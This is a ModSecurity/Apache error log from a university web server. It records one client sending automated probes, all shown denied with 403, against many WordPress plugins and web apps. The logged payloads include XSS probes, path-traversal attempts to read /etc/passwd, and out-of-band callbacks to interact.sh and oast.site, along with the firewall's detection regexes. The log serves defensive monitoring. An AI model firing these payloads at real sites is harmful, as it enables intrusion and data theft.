[Tue Aug 29 11:54:08.226428 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAAoZ6YEAAAAK"]
[Tue Aug 29 11:54:08.696942 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApa-BEAAAAg"]
[Tue Aug 29 11:54:09.956618 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApWY0gAAAAM"]
[Tue Aug 29 11:54:10.830423 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApV2zsAAAAJ"]
[Tue Aug 29 11:54:11.563610 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAApWY1UAAAAM"]
[Tue Aug 29 11:54:12.709412 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb079d4qqyxjeequ.oast.site found within TX:1: cjmnijtjmimvgniikdb079d4qqyxjeequ.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAAox7RAAAAAN"]
[Tue Aug 29 11:54:14.115259 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAAph8t0AAAAj"]
[Tue Aug 29 11:54:14.607365 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAAph8uAAAAAj"]
[Tue Aug 29 11:54:14.659287 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApmXswAAAAp"]
[Tue Aug 29 11:54:14.703034 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAApk-TYAAAAn"]
[Tue Aug 29 11:54:15.560459 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAolKgQAAAAe"]
[Tue Aug 29 11:54:16.620133 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAAo2m-wAAAAA"]
[Tue Aug 29 11:54:16.639024 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAAoUJioAAAAB"]
[Tue Aug 29 11:54:20.840211 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAApZHUUAAAAf"]
[Tue Aug 29 11:54:21.086538 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-cCo-f0AAApjIMkAAAAm"]
[Tue Aug 29 11:54:22.615835 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-sCo-f0AAAoZ6ckAAAAK"]
[Tue Aug 29 11:54:22.871359 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAAoz76YAAAAS"]
[Tue Aug 29 11:54:23.632668 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApl9@YAAAAo"]
[Tue Aug 29 11:54:25.073611 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAApXgdIAAAAU"]
[Tue Aug 29 11:54:27.151413 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAoGFmMAAAAE"]
[Tue Aug 29 11:54:27.571542 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqUB1UAAAAb"]
[Tue Aug 29 11:54:27.599635 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAqY54kAAAAr"]
[Tue Aug 29 11:54:29.826219 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAApZHV0AAAAf"]
[Tue Aug 29 11:54:31.542841 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAAqQ@tkAAAAB"]
[Tue Aug 29 11:54:31.668779 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAAolKh8AAAAe"]
[Tue Aug 29 11:54:33.068836 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CcCo-f0AAAqdbl0AAAAw"]
[Tue Aug 29 11:54:33.560539 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAolKiIAAAAe"]
[Tue Aug 29 11:54:34.554486 2023] [:error] [pid 2716] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqci6kAAAAv"]
[Tue Aug 29 11:54:35.540674 2023] [:error] [pid 2716] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16C8Co-f0AAAqci6wAAAAv"]
[Tue Aug 29 11:54:35.674353 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAqQ@uEAAAAB"]
[Tue Aug 29 11:54:35.675230 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAqY55kAAAAr"]
